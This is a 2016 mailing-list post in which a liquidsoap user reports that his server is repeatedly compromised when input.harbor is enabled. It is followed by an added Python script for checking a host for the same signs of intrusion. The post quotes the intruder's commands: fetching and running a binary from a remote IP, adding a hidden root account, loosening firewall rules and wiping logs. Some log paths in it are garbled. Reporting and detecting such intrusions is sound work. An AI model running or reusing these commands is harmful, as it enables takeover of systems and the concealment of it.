From: Mauro D. <mau...@gm...> - 2016-02-02 21:51:52
Guys, I have been using liquidsoap for some time. I have "input.harbor" enabled in my script; it is a dynamic script that always generates the user and password dynamically.

I saw that when "input.harbor" is enabled, my machine is invaded and the commands below are run on it. I formatted the machine 3 times and did several tests and yes, the security hole that allows access to my machine is when "input.harbor" is enabled.

Basically what I noticed is that the invader installs a SYS flood on my machine, nothing more than that, but this is very serious.

Can those who have "input.harbor" enabled please verify that? Check for the user "webll" in your /etc/passwd.

IP where the connection comes from: 104.239.228.251

Commands run on my machine on every access:

    ps -ef
    cd /bin
    wget http://58.64.207.219:888/sshh
    chmod 0755 sshh
    ./sshh
    useradd -o -u 0 -g 0 -M -d /root -s /bin/bash webll
    passwd webll
    iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
    iptables -D INPUT -p tcp --dport 6379 -j DROP
    echo>ar/log/syslog
    echo>ar/log/messages
    echo>ar/logtpd/access_log
    echo>ar/logtpd/error_log0
    echo>ar/log/xferlog
    echo>ar/logcure
    echo>ar/log/auth.log
    echo>ar/log/user.log
    echo>ar/log/wtmp
    echo>ar/log/lastlog
    echo>ar/log/btmp
    echo>ar/run/utmp
    echo >/root/.bash_history
    history-c

My input.harbor definition:

    live = input.harbor(
      id = "#{mount_name}",
      on_connect = live_start,
      on_disconnect = live_stop,
      buffer = 8.,
      max = 20.,
      icy = true,
      port = int_of_string(port2),              # Dynamic port
      user = "#{mount_name}",                   # Dynamic mount point
      password = "#{streamingPasswordHarbor}",  # Dynamic password
      "#{mount_name}")

System and version:

    root@liquidsoap:/home/ubuntu/live# uname -a
    Linux liquidsoap 3.13.0-74-generic #118-Ubuntu SMP Thu Dec 17 22:52:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    root@liquidsoap:/home/ubuntu/live# liquidsoap --version
    Liquidsoap 1.2.0+scm (git://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347)
    Copyright (c) 2003-2016 Savonet team
    Liquidsoap is open-source software, released under GNU General Public License.
    See <http://liquidsoap.fm> for more information.

-- 
Mauro Delazeri
+1 646 275 7568
New York - NY
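A triage check for the indicators listed in the message above, as an added example that is not part of the original post or of liquidsoap: it looks for extra UID 0 accounts (the effect of `useradd -o -u 0`), `iptables-save` rules on tcp/6379, and emptied log files. The sample data is constructed, and the `/var/log` paths are assumed standard locations rather than values taken from the post.

```python
"""Triage for the indicators in the post: a second UID 0 account,
firewall rules on tcp/6379, and log files that were emptied."""
import os

def uid0_accounts(passwd_text):
    """Return names of accounts other than root that have UID 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue  # skip comments and malformed entries
        name, uid = fields[0], fields[2]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            hits.append(name)
    return hits

def rules_on_port(iptables_save_text, port=6379):
    """Return iptables-save rule lines (-A ...) that match --dport <port>."""
    hits = []
    for line in iptables_save_text.splitlines():
        tokens = line.split()
        if tokens[:1] == ["-A"] and "--dport" in tokens:
            idx = tokens.index("--dport")
            if idx + 1 < len(tokens) and tokens[idx + 1] == str(port):
                hits.append(line.strip())
    return hits

def truncated_logs(paths, max_size=1):
    """Return existing files of at most max_size bytes ('echo > f' leaves 1).
    Hits are candidates for review: rotation can also leave empty files."""
    return [p for p in paths if os.path.isfile(p) and os.path.getsize(p) <= max_size]

# Constructed sample data, not taken from the poster's machine.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
webll:x:0:0::/root:/bin/bash
"""
SAMPLE_RULES = """*filter
:INPUT ACCEPT [0:0]
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6379 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    print("UID 0 accounts besides root:", uid0_accounts(SAMPLE_PASSWD))
    print("Rules touching tcp/6379:", rules_on_port(SAMPLE_RULES))
    logs = ["/var/log/auth.log", "/var/log/wtmp", "/var/log/lastlog"]  # assumed paths
    print("Emptied logs:", truncated_logs(logs))
```

On a live host, pass the contents of /etc/passwd and the output of `iptables-save` to the first two functions in place of the samples.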